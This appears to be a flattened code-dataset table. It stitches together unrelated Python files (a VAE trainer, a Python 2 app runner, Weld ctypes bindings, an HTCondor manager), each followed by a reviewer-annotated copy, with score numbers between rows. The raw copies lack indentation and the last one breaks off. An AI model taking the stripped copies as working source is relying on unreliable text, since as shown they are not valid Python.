            z_dim (int): Dimensions of the latent variable.
        Returns:
            None.
        """
        self.z_dim = z_dim
        # Dataloaders are filled in later by createDataLoader().
        self.dataloader_train = None
        self.dataloader_valid = None
        self.dataloader_test = None
        self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
        self.model = VAE(self.z_dim).to(self.device)
        self.writer = SummaryWriter(log_dir="./logs")
        self.lr = 0.001
        self.optimizer = optim.Adam(self.model.parameters(), lr=self.lr)
        self.num_max_epochs = 1000
        self.num_no_improved = 0   # consecutive epochs without validation improvement
        self.num_batch_train = 0   # running TensorBoard step counter (train batches)
        self.num_batch_valid = 0   # running TensorBoard step counter (valid batches)
        self.loss_valid = 10 ** 7  # Initialize with a large value
        self.loss_valid_min = 10 ** 7  # Initialize with a large value
        # NOTE(review): dataloader_test is still None here; createDataLoader()
        # patches the real loader onto this Visualize instance afterwards.
        self.Visualize = Visualize(self.z_dim, self.dataloader_test, self.model, self.device)

    def createDirectories(self):
        """Create directories for the tensorboard and learned model
        Args:
            None.
        Returns:
            None.
        """
        if not os.path.exists("./logs"):
            os.makedirs("./logs")
        if not os.path.exists("./params"):
            os.makedirs("./params")

    def createDataLoader(self):
        """Download MNIST and convert it to data loaders
        Args:
            None.
        Returns:
            None.
        """
        # Flatten each 28x28 image into a 784-vector after converting to tensor.
        transform = transforms.Compose([transforms.ToTensor(), transforms.Lambda(lambda x: x.view(-1))])  # Preprocessing for MNIST images
        dataset_train_valid = datasets.MNIST("./", train=True, download=True, transform=transform)  # Separate train data and test data to get a dataset
        dataset_test = datasets.MNIST("./", train=False, download=True, transform=transform)
        # Use 20% of train data as validation data
        size_train_valid = len(dataset_train_valid)  # 60000
        size_train = int(size_train_valid * 0.8)  # 48000
        size_valid = size_train_valid - size_train  # 12000
        dataset_train, dataset_valid = torch.utils.data.random_split(dataset_train_valid, [size_train, size_valid])
        # Create dataloaders from the datasets
        self.dataloader_train = torch.utils.data.DataLoader(dataset_train, batch_size=1000, shuffle=True)
        self.dataloader_valid = torch.utils.data.DataLoader(dataset_valid, batch_size=1000, shuffle=False)
        self.dataloader_test = torch.utils.data.DataLoader(dataset_test, batch_size=1000, shuffle=False)
        # Late-bind the test loader onto the Visualize helper (it was None in __init__).
        self.Visualize.dataloader_test = self.dataloader_test

    def train_batch(self):
        """Batch-based learning for training data
        Args:
            None.
        Returns:
            None.
        """
        self.model.train()
        for x, _ in self.dataloader_train:
            # lower_bound holds the ELBO terms [KL, reconstruction]; maximizing
            # the ELBO is implemented as minimizing its negative sum.
            lower_bound, _, _ = self.model(x, self.device)
            loss = -sum(lower_bound)
            self.model.zero_grad()
            loss.backward()
            self.optimizer.step()
            self.writer.add_scalar("Loss_train/KL", -lower_bound[0].cpu().detach().numpy(), self.num_iter + self.num_batch_train)
            self.writer.add_scalar("Loss_train/Reconst", -lower_bound[1].cpu().detach().numpy(), self.num_iter + self.num_batch_train)
            self.num_batch_train += 1
        # NOTE(review): rewinds the step counter by one each epoch, so the
        # TensorBoard x-coordinate (num_iter + num_batch_train) advances by
        # (num_batches - 1) per epoch -- confirm this offset is intentional.
        self.num_batch_train -= 1

    def valid_batch(self):
        """Batch-based learning for validating data
        Args:
            None.
        Returns:
            None.
        """
        loss = []
        # NOTE(review): no torch.no_grad() here -- gradients are still tracked
        # during validation, which costs memory but does not update weights.
        self.model.eval()
        for x, _ in self.dataloader_valid:
            lower_bound, _, _ = self.model(x, self.device)
            loss.append(-sum(lower_bound).cpu().detach().numpy())
            self.writer.add_scalar("Loss_valid/KL", -lower_bound[0].cpu().detach().numpy(), self.num_iter + self.num_batch_valid)
            self.writer.add_scalar("Loss_valid/Reconst", -lower_bound[1].cpu().detach().numpy(), self.num_iter + self.num_batch_valid)
            self.num_batch_valid += 1
        # Same one-step rewind as train_batch (see note there).
        self.num_batch_valid -= 1
        self.loss_valid = np.mean(loss)
        self.loss_valid_min = np.minimum(self.loss_valid_min, self.loss_valid)

    def early_stopping(self):
        """Judging early stopping
        Args:
            None.
        Returns:
            None.
        """
        if self.loss_valid_min < self.loss_valid:  # If the loss of this iteration is greater than the minimum loss of the previous iterations, the counter variable is incremented.
            self.num_no_improved += 1
            print(f"Validation got worse for the {self.num_no_improved} time in a row.")
        else:  # If the loss of this iteration is the same or smaller than the minimum loss of the previous iterations, reset the counter variable and save parameters.
            self.num_no_improved = 0
            torch.save(self.model.state_dict(), f"./params/model_z_{self.z_dim}.pth")

    def main(self):
        """Full pipeline: setup, train/validate with early stopping, then
        reload the best checkpoint and run every visualization."""
        self.createDirectories()
        self.createDataLoader()
        print("-----Start training-----")
        # The epoch index is stored on self so train_batch/valid_batch can use
        # it as part of their TensorBoard step coordinates.
        for self.num_iter in range(self.num_max_epochs):
            self.train_batch()
            self.valid_batch()
            print(f"[EPOCH{self.num_iter + 1}] loss_valid: {int(self.loss_valid)} | Loss_valid_min: {int(self.loss_valid_min)}")
            self.early_stopping()
            # Stop after 10 consecutive epochs without improvement.
            if self.num_no_improved >= 10:
                print("Apply early stopping")
                break
        self.writer.close()
        print("-----Stop training-----")
        print("-----Start Visualization-----")
        # Reload the best (last saved) parameters before visualizing.
        self.model.load_state_dict(torch.load(f"./params/model_z_{self.z_dim}.pth"))
        self.model.eval()
        self.Visualize.createDirectories()
        self.Visualize.reconstruction()
        self.Visualize.latent_space()
        self.Visualize.lattice_point()
        self.Visualize.walkthrough()
        print("-----Stop Visualization-----")
if __name__ == '__main__':
fire.Fire(Main) | 0.881207 | 0.416915 |
import subprocess
import httplib
import envoy
import socket
import time
import os
class App(object):
def __init__(self, host, port, root="~/.bam"):
self.host = host
self.port = port
self.root = root
self.proc = None
@property
def cmd(self):
"""Return the command to start this app, excluding the Python interpreter."""
return "manage.py runserver %d" % (self.port)
@property
def python(self):
"""Return the absolute path to the Python interpreter for this app."""
if self.venv:
return "%s/bin/python" % self.venv
else:
return "python"
@property
def venv(self):
"""
Return the path to the virtualenv for this app, as specified by the `.venv`
file in the project root. Return `None` if the file doesn't exist.
"""
filename = "%s/.venv" % self.path
if os.path.exists(filename):
venv = open(filename).read().strip()
return os.path.expanduser(venv)
@property
def environment(self):
filename = "%s/.bam-vars" % self.path
try:
with open(filename) as f:
return self._parse_env(f.read())
except:
return { }
@property
def path(self):
"""Return the path to this app."""
return os.path.join(os.path.expanduser(self.root), self.name)
@property
def name(self):
"""Return the name (hostname minus the TLD) of this app."""
return self.host.rsplit(".", 1)[0]
def _parse_env(self, env_str):
"""Parse an environment file (typically `.bam-env`) into a dict."""
env = {}
for line in env_str.strip().split():
key, val = line.split("=", 1)
env[key] = val
return env
def start(self):
print "Starting %r on %r in venv %r with env %r" % (self.name, self.port, self.venv, self.environment)
self.proc = self._connect("%s %s" % (self.python, self.cmd), cwd=self.path)
def stop(self):
self.proc.kill()
self.proc = None
def is_running(self):
"""Return `True` if this app is currently running."""
return self.proc and (self.proc.status_code is None)
def request(self, path, headers):
"""
Perform an HTTP request against this app, starting it if necessary. Return
an `httplib.HTTPResponse` object, or `None` if the app can't be reached.
"""
if not self.is_running():
self.start()
failures = 0
headers["X-Forwarded-Host"] = self.host
headers["X-Forwarded-Server"] = self.host
while True:
try:
conn = httplib.HTTPConnection("localhost", self.port)
conn.request("GET", path, headers=headers)
return conn.getresponse()
# If the port isn't open yet, keep on trying. The server probably hasn't
# warmed up yet. Give up if it doesn't work out within a few seconds.
except socket.error, e:
if (e.errno == 61) and (failures < 5):
failures += 1
time.sleep(1)
else:
return None
# Subprocesses are handled by Envoy, for now. I'm probably going to remove it
# and work directly with the subprocess interface, because it isn't nearly as
# painful as I remember.
def _connect(self, command, data=None, env=None, cwd=None):
command_str = envoy.expand_args(command).pop()
proc = subprocess.Popen(
command_str,
cwd=cwd,
env=self.environment,
stdin=None,
stdout=open("%s/bam.stdout.log" % cwd, "w"),
stderr=open("%s/bam.stderr.log" % cwd, "w"))
return envoy.ConnectedCommand(process=proc) | bam/app.py |
import subprocess
import httplib
import envoy
import socket
import time
import os
class App(object):
    """A single managed web app: locates its checkout under *root*, starts it
    with ``manage.py runserver`` on *port*, and proxies HTTP requests to it.

    NOTE: Python 2 code (print statement, httplib, ``except X, e`` syntax).
    """

    def __init__(self, host, port, root="~/.bam"):
        self.host = host  # full hostname this app is served under
        self.port = port  # local port the dev server listens on
        self.root = root  # directory containing all app checkouts
        self.proc = None  # envoy.ConnectedCommand once started, else None

    @property
    def cmd(self):
        """Return the command to start this app, excluding the Python interpreter."""
        return "manage.py runserver %d" % (self.port)

    @property
    def python(self):
        """Return the absolute path to the Python interpreter for this app."""
        if self.venv:
            return "%s/bin/python" % self.venv
        else:
            return "python"

    @property
    def venv(self):
        """
        Return the path to the virtualenv for this app, as specified by the `.venv`
        file in the project root. Return `None` if the file doesn't exist.
        """
        filename = "%s/.venv" % self.path
        if os.path.exists(filename):
            venv = open(filename).read().strip()
            return os.path.expanduser(venv)

    @property
    def environment(self):
        """Return extra environment variables parsed from `.bam-vars`, or {}
        if the file is missing or unreadable."""
        filename = "%s/.bam-vars" % self.path
        try:
            with open(filename) as f:
                return self._parse_env(f.read())
        # NOTE(review): bare except swallows *every* error (including a
        # malformed vars file), not just a missing file.
        except:
            return { }

    @property
    def path(self):
        """Return the path to this app."""
        return os.path.join(os.path.expanduser(self.root), self.name)

    @property
    def name(self):
        """Return the name (hostname minus the TLD) of this app."""
        return self.host.rsplit(".", 1)[0]

    def _parse_env(self, env_str):
        """Parse an environment file (typically `.bam-env`) into a dict."""
        # NOTE(review): split() breaks on any whitespace, so KEY=VALUE pairs
        # whose values contain spaces will be mis-parsed.
        env = {}
        for line in env_str.strip().split():
            key, val = line.split("=", 1)
            env[key] = val
        return env

    def start(self):
        """Launch this app's dev server as a subprocess."""
        print "Starting %r on %r in venv %r with env %r" % (self.name, self.port, self.venv, self.environment)
        self.proc = self._connect("%s %s" % (self.python, self.cmd), cwd=self.path)

    def stop(self):
        """Kill the running subprocess and forget about it."""
        self.proc.kill()
        self.proc = None

    def is_running(self):
        """Return `True` if this app is currently running."""
        return self.proc and (self.proc.status_code is None)

    def request(self, path, headers):
        """
        Perform an HTTP request against this app, starting it if necessary. Return
        an `httplib.HTTPResponse` object, or `None` if the app can't be reached.
        """
        if not self.is_running():
            self.start()
        failures = 0
        headers["X-Forwarded-Host"] = self.host
        headers["X-Forwarded-Server"] = self.host
        while True:
            try:
                conn = httplib.HTTPConnection("localhost", self.port)
                conn.request("GET", path, headers=headers)
                return conn.getresponse()
            # If the port isn't open yet, keep on trying. The server probably hasn't
            # warmed up yet. Give up if it doesn't work out within a few seconds.
            # NOTE(review): errno 61 is ECONNREFUSED on BSD/macOS only; on Linux
            # ECONNREFUSED is 111 -- confirm the target platform, or prefer
            # errno.ECONNREFUSED for portability.
            except socket.error, e:
                if (e.errno == 61) and (failures < 5):
                    failures += 1
                    time.sleep(1)
                else:
                    return None

    # Subprocesses are handled by Envoy, for now. I'm probably going to remove it
    # and work directly with the subprocess interface, because it isn't nearly as
    # painful as I remember.
    def _connect(self, command, data=None, env=None, cwd=None):
        # NOTE(review): the `data` and `env` parameters are ignored; the
        # subprocess always receives self.environment as its environment.
        command_str = envoy.expand_args(command).pop()
        proc = subprocess.Popen(
            command_str,
            cwd=cwd,
            env=self.environment,
            stdin=None,
            # stdout/stderr are redirected into log files inside the app dir;
            # the file handles are intentionally left to the subprocess.
            stdout=open("%s/bam.stdout.log" % cwd, "w"),
            stderr=open("%s/bam.stderr.log" % cwd, "w"))
        return envoy.ConnectedCommand(process=proc)
import copy
import platform
from ctypes import *
import pkg_resources
system = platform.system()
if system == 'Linux':
lib_file = "../weld-latest/target/release/libweld.so"
elif system == 'Windows':
lib_file = "libweld.dll"
elif system == 'Darwin':
lib_file = "libweld.dylib"
else:
raise OSError("Unsupported platform {}", system)
lib_file = pkg_resources.resource_filename(__name__, lib_file)
weld = CDLL(lib_file, mode=RTLD_GLOBAL)
# Used for some type checking carried out by ctypes
class c_weld_module(c_void_p):
pass
class c_weld_conf(c_void_p):
pass
class c_weld_err(c_void_p):
pass
class c_weld_value(c_void_p):
pass
class c_weld_context(c_void_p):
pass
class WeldModule(c_void_p):
def __init__(self, code, conf, err):
weld_module_compile = weld.weld_module_compile
weld_module_compile.argtypes = [
c_char_p, c_weld_conf, c_weld_err]
weld_module_compile.restype = c_weld_module
code = c_char_p(code.encode('utf-8'))
self.module = weld_module_compile(code, conf.conf, err.error)
def run(self, conf, arg, err):
"""
WeldContext is currently hidden from the Python API. We create a new
context per Weld run and give ownership of it to the resulting value.
NOTE: This can leak the context if the result of the Weld run is an
error.
"""
weld_context_new = weld.weld_context_new
weld_context_new.argtypes = [c_weld_conf]
weld_context_new.restype = c_weld_context
ctx = weld_context_new(conf.conf)
weld_module_run = weld.weld_module_run
# module, context, arg, &err
weld_module_run.argtypes = [
c_weld_module, c_weld_context, c_weld_value, c_weld_err]
weld_module_run.restype = c_weld_value
ret = weld_module_run(self.module, ctx, arg.val, err.error)
return WeldValue(ret, assign=True, _ctx=ctx)
def __del__(self):
weld_module_free = weld.weld_module_free
weld_module_free.argtypes = [c_weld_module]
weld_module_free.restype = None
weld_module_free(self.module)
class WeldValue(c_void_p):
def __init__(self, value, assign=False, _ctx=None):
if assign is False:
weld_value_new = weld.weld_value_new
weld_value_new.argtypes = [c_void_p]
weld_value_new.restype = c_weld_value
self.val = weld_value_new(value)
else:
self.val = value
self._ctx = _ctx
self.freed = False
def _check(self):
if self.freed:
raise ValueError("Attempted to use freed WeldValue")
def data(self):
self._check()
weld_value_data = weld.weld_value_data
weld_value_data.argtypes = [c_weld_value]
weld_value_data.restype = c_void_p
return weld_value_data(self.val)
def memory_usage(self):
self._check()
weld_value_memory_usage = weld.weld_value_memory_usage
weld_value_memory_usage.argtypes = [c_weld_value]
weld_value_memory_usage.restype = c_int64
return weld_value_memory_usage(self.val)
def free(self):
self._check()
weld_value_free = weld.weld_value_free
weld_value_free.argtypes = [c_weld_value]
weld_value_free.restype = None
# One context per value for now -- free the context if there is one.
if self._ctx != None:
weld_context_free = weld.weld_context_free
weld_context_free.argtypes = [c_weld_context]
weld_context_free.restype = None
weld_context_free(self._ctx)
self._ctx = None
self.freed = True
return weld_value_free(self.val)
class WeldConf(c_void_p):
def __init__(self):
weld_conf_new = weld.weld_conf_new
weld_conf_new.argtypes = []
weld_conf_new.restype = c_weld_conf
self.conf = weld_conf_new()
def get(self, key):
key = c_char_p(key.encode('utf-8'))
weld_conf_get = weld.weld_conf_get
weld_conf_get.argtypes = [c_weld_conf, c_char_p]
weld_conf_get.restype = c_char_p
val = weld_conf_get(self.conf, key)
return copy.copy(val)
def set(self, key, value):
key = c_char_p(key.encode('utf-8'))
value = c_char_p(value.encode('utf-8'))
weld_conf_set = weld.weld_conf_set
weld_conf_set.argtypes = [c_weld_conf, c_char_p, c_char_p]
weld_conf_set.restype = None
weld_conf_set(self.conf, key, value)
def __del__(self):
weld_conf_free = weld.weld_conf_free
weld_conf_free.argtypes = [c_weld_conf]
weld_conf_free.restype = None
weld_conf_free(self.conf)
class WeldError(c_void_p):
def __init__(self):
weld_error_new = weld.weld_error_new
weld_error_new.argtypes = []
weld_error_new.restype = c_weld_err
self.error = weld_error_new()
def code(self):
weld_error_code = weld.weld_error_code
weld_error_code.argtypes = [c_weld_err]
weld_error_code.restype = c_uint64
return weld_error_code(self.error)
def message(self):
weld_error_message = weld.weld_error_message
weld_error_message.argtypes = [c_weld_err]
weld_error_message.restype = c_char_p
val = weld_error_message(self.error)
return copy.copy(val)
def __del__(self):
weld_error_free = weld.weld_error_free
weld_error_free.argtypes = [c_weld_err]
weld_error_free.restype = None
weld_error_free(self.error)
WeldLogLevelOff = 0
WeldLogLevelError = 1
WeldLogLevelWarn = 2
WeldLogLevelInfo = 3
WeldLogLevelDebug = 4
WeldLogLevelTrace = 5
def weld_set_log_level(log_level):
"""
Sets the log_level for Weld:
0 = No Logs,
1 = Error,
2 = Warn,
3 = Info,
4 = Debug,
5 = Trace.
"""
weld.weld_set_log_level(log_level) | python/benchmarks/weld-python/bindings_latest.py |
import copy
import platform
from ctypes import *
import pkg_resources
# Select the platform-specific shared-library name for Weld, resolve it
# relative to this package, and load it with RTLD_GLOBAL so its symbols are
# visible to subsequently loaded extensions.
system = platform.system()
if system == 'Linux':
    lib_file = "../weld-latest/target/release/libweld.so"
elif system == 'Windows':
    lib_file = "libweld.dll"
elif system == 'Darwin':
    lib_file = "libweld.dylib"
else:
    # BUG FIX: the original passed `system` as a second positional argument to
    # OSError ("Unsupported platform {}", system), so the placeholder was never
    # interpolated; format the message instead.
    raise OSError("Unsupported platform {}".format(system))
lib_file = pkg_resources.resource_filename(__name__, lib_file)
weld = CDLL(lib_file, mode=RTLD_GLOBAL)
# Used for some type checking carried out by ctypes
class c_weld_module(c_void_p):
    """Opaque ctypes handle to a compiled Weld module."""
    pass

class c_weld_conf(c_void_p):
    """Opaque ctypes handle to a Weld configuration object."""
    pass

class c_weld_err(c_void_p):
    """Opaque ctypes handle to a Weld error object."""
    pass

class c_weld_value(c_void_p):
    """Opaque ctypes handle to a Weld value."""
    pass

class c_weld_context(c_void_p):
    """Opaque ctypes handle to a Weld execution context."""
    pass
class WeldModule(c_void_p):
    """A compiled Weld program; wraps the C `weld_module_t` handle."""

    def __init__(self, code, conf, err):
        """Compile *code* (Weld source string) under *conf*.

        Compilation failures are reported through *err* (a WeldError), not
        raised as Python exceptions.
        """
        weld_module_compile = weld.weld_module_compile
        weld_module_compile.argtypes = [
            c_char_p, c_weld_conf, c_weld_err]
        weld_module_compile.restype = c_weld_module
        code = c_char_p(code.encode('utf-8'))
        self.module = weld_module_compile(code, conf.conf, err.error)

    def run(self, conf, arg, err):
        """
        WeldContext is currently hidden from the Python API. We create a new
        context per Weld run and give ownership of it to the resulting value.
        NOTE: This can leak the context if the result of the Weld run is an
        error.
        """
        weld_context_new = weld.weld_context_new
        weld_context_new.argtypes = [c_weld_conf]
        weld_context_new.restype = c_weld_context
        ctx = weld_context_new(conf.conf)
        weld_module_run = weld.weld_module_run
        # module, context, arg, &err
        weld_module_run.argtypes = [
            c_weld_module, c_weld_context, c_weld_value, c_weld_err]
        weld_module_run.restype = c_weld_value
        ret = weld_module_run(self.module, ctx, arg.val, err.error)
        # The returned WeldValue takes ownership of ctx (freed in its free()).
        return WeldValue(ret, assign=True, _ctx=ctx)

    def __del__(self):
        # Release the native module when the Python wrapper is collected.
        weld_module_free = weld.weld_module_free
        weld_module_free.argtypes = [c_weld_module]
        weld_module_free.restype = None
        weld_module_free(self.module)
class WeldValue(c_void_p):
    """Wrapper around a Weld `weld_value_t` handle.

    Either wraps caller-owned data (``assign=False``, the default) or adopts a
    handle returned by a Weld run (``assign=True``), optionally together with
    the WeldContext that owns its memory. Callers must call :meth:`free`
    explicitly; there is no ``__del__``.
    """

    def __init__(self, value, assign=False, _ctx=None):
        if assign is False:
            weld_value_new = weld.weld_value_new
            weld_value_new.argtypes = [c_void_p]
            weld_value_new.restype = c_weld_value
            self.val = weld_value_new(value)
        else:
            # Adopt an already-created handle (e.g. the result of a run).
            self.val = value
        self._ctx = _ctx
        self.freed = False

    def _check(self):
        """Raise ValueError on use-after-free of the underlying handle."""
        if self.freed:
            raise ValueError("Attempted to use freed WeldValue")

    def data(self):
        """Return a raw pointer (int) to the value's underlying data."""
        self._check()
        weld_value_data = weld.weld_value_data
        weld_value_data.argtypes = [c_weld_value]
        weld_value_data.restype = c_void_p
        return weld_value_data(self.val)

    def memory_usage(self):
        """Return the memory usage in bytes reported for this value."""
        self._check()
        weld_value_memory_usage = weld.weld_value_memory_usage
        weld_value_memory_usage.argtypes = [c_weld_value]
        weld_value_memory_usage.restype = c_int64
        return weld_value_memory_usage(self.val)

    def free(self):
        """Free the value and, if this value owns one, its WeldContext."""
        self._check()
        weld_value_free = weld.weld_value_free
        weld_value_free.argtypes = [c_weld_value]
        weld_value_free.restype = None
        # One context per value for now -- free the context if there is one.
        # IDIOM FIX: compare against None with `is not None`, not `!=`.
        if self._ctx is not None:
            weld_context_free = weld.weld_context_free
            weld_context_free.argtypes = [c_weld_context]
            weld_context_free.restype = None
            weld_context_free(self._ctx)
            self._ctx = None
        self.freed = True
        return weld_value_free(self.val)
class WeldConf(c_void_p):
    """String-keyed configuration object handed to Weld compile/run calls."""

    def __init__(self):
        # Allocate a fresh native configuration handle.
        alloc = weld.weld_conf_new
        alloc.argtypes = []
        alloc.restype = c_weld_conf
        self.conf = alloc()

    def get(self, key):
        """Look up *key* (str) and return a copy of the stored value."""
        lookup = weld.weld_conf_get
        lookup.argtypes = [c_weld_conf, c_char_p]
        lookup.restype = c_char_p
        encoded_key = c_char_p(key.encode('utf-8'))
        found = lookup(self.conf, encoded_key)
        return copy.copy(found)

    def set(self, key, value):
        """Store *value* under *key*; both are UTF-8 encoded first."""
        store = weld.weld_conf_set
        store.argtypes = [c_weld_conf, c_char_p, c_char_p]
        store.restype = None
        encoded_key = c_char_p(key.encode('utf-8'))
        encoded_value = c_char_p(value.encode('utf-8'))
        store(self.conf, encoded_key, encoded_value)

    def __del__(self):
        # Release the native handle when the wrapper is collected.
        release = weld.weld_conf_free
        release.argtypes = [c_weld_conf]
        release.restype = None
        release(self.conf)
class WeldError(c_void_p):
    """Out-parameter object that Weld calls fill with an error code/message."""

    def __init__(self):
        alloc = weld.weld_error_new
        alloc.argtypes = []
        alloc.restype = c_weld_err
        self.error = alloc()

    def code(self):
        """Return the numeric error code (0 means success)."""
        fetch_code = weld.weld_error_code
        fetch_code.argtypes = [c_weld_err]
        fetch_code.restype = c_uint64
        return fetch_code(self.error)

    def message(self):
        """Return a copy of the human-readable error message."""
        fetch_message = weld.weld_error_message
        fetch_message.argtypes = [c_weld_err]
        fetch_message.restype = c_char_p
        text = fetch_message(self.error)
        return copy.copy(text)

    def __del__(self):
        # Release the native handle when the wrapper is collected.
        release = weld.weld_error_free
        release.argtypes = [c_weld_err]
        release.restype = None
        release(self.error)
# Log-level constants accepted by weld_set_log_level (higher = more verbose).
WeldLogLevelOff = 0
WeldLogLevelError = 1
WeldLogLevelWarn = 2
WeldLogLevelInfo = 3
WeldLogLevelDebug = 4
WeldLogLevelTrace = 5
def weld_set_log_level(log_level):
    """
    Sets the log_level for Weld:
    0 = No Logs,
    1 = Error,
    2 = Warn,
    3 = Info,
    4 = Debug,
    5 = Trace.
    (Use the WeldLogLevel* constants defined above.)
    """
    weld.weld_set_log_level(log_level)
from threading import Thread
from conpaas.core.expose import expose
from conpaas.core.manager import BaseManager
from conpaas.core.https.server import HttpJsonResponse, HttpErrorResponse
from conpaas.services.htcondor.agent import client
import node_info
class HTCondorManager(BaseManager):
"""Manager class with the following exposed methods:
shutdown() -- POST
add_nodes(count) -- POST
remove_nodes(count) -- POST
list_nodes() -- GET
get_service_info() -- GET
get_node_info(serviceNodeId) -- GET
"""
def __init__(self, config_parser, **kwargs):
"""Initialize a HTCondor Manager.
'config_parser' represents the manager config file.
**kwargs holds anything that can't be sent in config_parser."""
BaseManager.__init__(self, config_parser)
self.nodes = []
# Setup the clouds' controller
self.controller.generate_context('htcondor')
self.hub_ip = None
def _do_startup(self, cloud):
"""Start up the service. The first node will be an agent running a
HTCondor Hub and a HTCondor Node."""
startCloud = self._init_cloud(cloud)
vals = { 'action': '_do_startup', 'count': 1 }
self.logger.debug(self.ACTION_REQUESTING_NODES % vals)
try:
nodes = self.controller.create_nodes(1,
client.check_agent_process, self.AGENT_PORT, startCloud)
hub_node = nodes[0]
# The first agent is a HTCondor Hub and a HTCondor Node
client.create_hub(hub_node.ip, self.AGENT_PORT)
client.create_node(hub_node.ip, self.AGENT_PORT, hub_node.ip)
self.logger.info("Added node %s: %s " % (hub_node.id, hub_node.ip))
node_info.add_node_info('/etc/hosts', hub_node.ip, hub_node.id)
self.hub_ip = hub_node.ip
# Extend the nodes list with the newly created one
self.nodes += nodes
self.state = self.S_RUNNING
except Exception, err:
self.logger.exception('_do_startup: Failed to create hub: %s' % err)
self.state = self.S_ERROR
def _do_stop(self):
"""Delete all nodes and switch to status STOPPED"""
self.controller.delete_nodes(self.nodes)
self.nodes = [] # Not only delete the nodes, but clear the list too
self.state = self.S_STOPPED
def __check_count_in_args(self, kwargs):
"""Return 'count' if all is good. HttpErrorResponse otherwise."""
# The frontend sends count under 'node'.
if 'node' in kwargs:
kwargs['count'] = kwargs['node']
if not 'count' in kwargs:
return HttpErrorResponse(self.REQUIRED_ARG_MSG % { 'arg': 'count' })
if not isinstance(kwargs['count'], int):
return HttpErrorResponse(
"ERROR: Expected an integer value for 'count'")
return int(kwargs['count'])
@expose('POST')
def add_nodes(self, kwargs):
"""Add kwargs['count'] nodes to this deployment"""
self.controller.add_context_replacement(dict(STRING='htcondor'))
# Adding nodes makes sense only in the RUNNING state
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'add_nodes' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
# Ensure 'count' is valid
count_or_err = self.__check_count_in_args(kwargs)
if isinstance(count_or_err, HttpErrorResponse):
return count_or_err
count = count_or_err
self.state = self.S_ADAPTING
Thread(target=self._do_add_nodes, args=[count, kwargs['cloud']]).start()
return HttpJsonResponse({ 'state': self.state })
def _do_add_nodes(self, count, cloud):
"""Add 'count' HTCondor Nodes to this deployment"""
startCloud = self._init_cloud(cloud)
vals = { 'action': '_do_add_nodes', 'count': count }
self.logger.debug(self.ACTION_REQUESTING_NODES % vals)
node_instances = self.controller.create_nodes(count,
client.check_agent_process, self.AGENT_PORT, startCloud)
# Startup agents
for node in node_instances:
client.create_node(node.ip, self.AGENT_PORT, self.hub_ip)
self.logger.info("Added node %s: %s " % (node.id, node.ip))
node_info.add_node_info('/etc/hosts', node.ip, node.id)
self.nodes += node_instances
self.state = self.S_RUNNING
@expose('POST')
def remove_nodes(self, kwargs):
"""Remove kwargs['count'] nodes from this deployment"""
# Removing nodes only if RUNNING
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'remove_nodes' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
# Ensure 'count' is valid
count_or_err = self.__check_count_in_args(kwargs)
if isinstance(count_or_err, HttpErrorResponse):
return count_or_err
count = count_or_err
if count > len(self.nodes) - 1:
return HttpErrorResponse("ERROR: Cannot remove so many nodes")
self.state = self.S_ADAPTING
Thread(target=self._do_remove_nodes, args=[count]).start()
return HttpJsonResponse({ 'state': self.state })
def _do_remove_nodes(self, count):
"""Remove 'count' nodes, starting from the end of the list. This way
the HTCondor Hub gets removed last."""
for _ in range(count):
node = self.nodes.pop()
self.logger.info("Removing node with IP %s" % node.ip)
self.controller.delete_nodes([ node ])
node_info.remove_node_info('/etc/hosts', node.ip)
self.state = self.S_RUNNING
def __is_hub(self, node):
"""Return True if the given node is the HTCondor Hub"""
return node.ip == self.hub_ip
@expose('GET')
def list_nodes(self, kwargs):
"""Return a list of running nodes"""
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'list_nodes' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
htcondor_nodes = [
node.id for node in self.nodes if not self.__is_hub(node)
]
htcondor_hub = [
node.id for node in self.nodes if self.__is_hub(node)
]
return HttpJsonResponse({
'hub': htcondor_hub,
'node': htcondor_nodes
})
@expose('GET')
def get_service_info(self, kwargs):
"""Return the service state and type"""
return HttpJsonResponse({'state': self.state, 'type': 'htcondor'})
@expose('GET')
def get_node_info(self, kwargs):
"""Return information about the node identified by the given
kwargs['serviceNodeId']"""
# serviceNodeId is a required parameter
if 'serviceNodeId' not in kwargs:
vals = { 'arg': 'serviceNodeId' }
return HttpErrorResponse(self.REQUIRED_ARG_MSG % vals)
serviceNodeId = kwargs.pop('serviceNodeId')
serviceNode = None
for node in self.nodes:
if serviceNodeId == node.id:
serviceNode = node
break
if serviceNode is None:
return HttpErrorResponse(
'ERROR: Cannot find node with serviceNode=%s' % serviceNodeId)
return HttpJsonResponse({
'serviceNode': {
'id': serviceNode.id,
'ip': serviceNode.ip,
'is_hub': self.__is_hub(serviceNode)
}
}) | conpaas-services/src/conpaas/services/htcondor/manager/manager.py | from threading import Thread
from conpaas.core.expose import expose
from conpaas.core.manager import BaseManager
from conpaas.core.https.server import HttpJsonResponse, HttpErrorResponse
from conpaas.services.htcondor.agent import client
import node_info
class HTCondorManager(BaseManager):
"""Manager class with the following exposed methods:
shutdown() -- POST
add_nodes(count) -- POST
remove_nodes(count) -- POST
list_nodes() -- GET
get_service_info() -- GET
get_node_info(serviceNodeId) -- GET
"""
def __init__(self, config_parser, **kwargs):
"""Initialize a HTCondor Manager.
'config_parser' represents the manager config file.
**kwargs holds anything that can't be sent in config_parser."""
BaseManager.__init__(self, config_parser)
self.nodes = []
# Setup the clouds' controller
self.controller.generate_context('htcondor')
self.hub_ip = None
def _do_startup(self, cloud):
"""Start up the service. The first node will be an agent running a
HTCondor Hub and a HTCondor Node."""
startCloud = self._init_cloud(cloud)
vals = { 'action': '_do_startup', 'count': 1 }
self.logger.debug(self.ACTION_REQUESTING_NODES % vals)
try:
nodes = self.controller.create_nodes(1,
client.check_agent_process, self.AGENT_PORT, startCloud)
hub_node = nodes[0]
# The first agent is a HTCondor Hub and a HTCondor Node
client.create_hub(hub_node.ip, self.AGENT_PORT)
client.create_node(hub_node.ip, self.AGENT_PORT, hub_node.ip)
self.logger.info("Added node %s: %s " % (hub_node.id, hub_node.ip))
node_info.add_node_info('/etc/hosts', hub_node.ip, hub_node.id)
self.hub_ip = hub_node.ip
# Extend the nodes list with the newly created one
self.nodes += nodes
self.state = self.S_RUNNING
except Exception, err:
self.logger.exception('_do_startup: Failed to create hub: %s' % err)
self.state = self.S_ERROR
def _do_stop(self):
